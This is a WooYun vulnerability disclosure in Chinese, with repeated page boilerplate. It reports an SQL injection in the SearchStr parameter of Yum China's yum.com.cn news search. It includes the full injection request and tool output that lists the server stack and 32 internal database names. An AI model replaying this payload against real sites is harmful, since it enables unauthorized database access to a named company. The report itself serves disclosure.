百胜餐饮集团中国事业部某处SQL注入

admin

139803
文章

114
评论

2015年8月11日10:14:17评论189 views字数 210阅读0分42秒阅读模式

摘要

2014-11-15：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-12-30：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(0) 关注此漏洞

缺陷编号： WooYun-2014-83367

漏洞标题：百胜餐饮集团中国事业部某处SQL注入

漏洞作者： pandada

提交时间： 2014-11-15 12:00

公开时间： 2014-12-30 12:02

漏洞类型：

危害等级：高

自评Rank： 12

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

2014-11-15：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-12-30：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

百胜餐饮集团中国事业部隶属于美国纽约证券交易所挂牌上市的百胜餐饮集团(Yum! Brands，Inc.)。百胜餐饮集团是全球餐厅网络最大的餐饮集团之一，在全球超过125个国家和地区拥有超过39000家连锁餐厅, 员工人数150多万。百胜餐饮集团旗下肯德基、必胜客和塔可钟三个餐饮品牌分别在烹鸡、比萨、墨西哥风味食品连锁餐饮领域居全球领导地位。2013年，百胜餐饮集团荣获美国《企业责任杂志》评选的“100家最佳企业公民”。

详细说明：

注入点为SearchStr

code 区域

GET /news_search_result.aspx?SearchStr=e%25'%20AND%203*2*1%3d6%20AND%20'000c9fZ'%21%3d'000c9fZ%25 HTTP/1.1
 X-Requested-With: XMLHttpRequest
 Referer: http://www.yum.com.cn:80/
 Cookie: NSC_CX_QfstjtufodzHspvq=ffffffff09320b0445525d5f4f58455e445a4a423660
 Host: www.yum.com.cn
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
 Accept: */*

漏洞证明：

code 区域

web server operating system: Windows 2008 or Vista
 web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
 back-end DBMS: Microsoft SQL Server 2008
 available databases [32]:
 [*] [YUM-PHD]
 [*] DFJB
 [*] dfjb_new
 [*] Email_service
 [*] kfchealth
 [*] KFCII
 [*] kfcmusic2011
 [*] LansumEdm
 [*] LittleSheep2013
 [*] master
 [*] model
 [*] msdb
 [*] phdi2011
 [*] phdi2014
 [*] phduty
 [*] PHParty
 [*] PizzaHut
 [*] tempdb
 [*] xfy
 [*] xfyAAA
 [*] xfyqa
 [*] YUM
 [*] YumCampaignSystem
 [*] YumService
 [*] YumStore
 [*] YumStore20141107
 [*] YumstoreAAA
 [*] YumStoreVisited
 [*] YumStoreVisited_new
 [*] YumStoreVisitedAAA
 [*] YumSupplier
 [*] Yumyouhui

修复方案：

参数过滤

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

百胜餐饮集团中国事业部某处SQL注入

漏洞概要关注数(0) 关注此漏洞

缺陷编号： WooYun-2014-83367

漏洞标题：百胜餐饮集团中国事业部某处SQL注入

相关厂商： yum.com.cn

漏洞作者： pandada

提交时间： 2014-11-15 12:00

公开时间： 2014-12-30 12:02

漏洞类型：

危害等级：高

自评Rank： 12

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org-优酷多个分站存在SSRF漏洞大礼包

WooYun.org-优特捷某内部邮箱账户外泄涉及大量敏感信息(多家合作单位躺枪)

WooYun.org-某网平行权限漏洞（影响所有使用用户）

Bypass分享 | 形而上学，不行退学的一句话

格兰仕千万数据库信息泄露

3399游戏源码下载

WEFANS喂饭后台弱口令

国家电网某充电APP系统Getshell涉及大量用户敏感信息

威锋网游戏站存在SQL注入（含多重绕过+编码）

APP安全之三维度从一个毫无用处的xss到获取大量身份证信息图片(包括李刚身份证)

发表评论

在线咨询

微信

漏洞概要 关注数(0) 关注此漏洞

缺陷编号： WooYun-2014-83367

漏洞标题： 百胜餐饮集团中国事业部某处SQL注入

相关厂商： yum.com.cn

漏洞作者： pandada

提交时间： 2014-11-15 12:00

公开时间： 2014-12-30 12:02

漏洞类型：

危害等级： 高

自评Rank： 12

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(0) 关注此漏洞

漏洞标题：百胜餐饮集团中国事业部某处SQL注入

危害等级：高

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分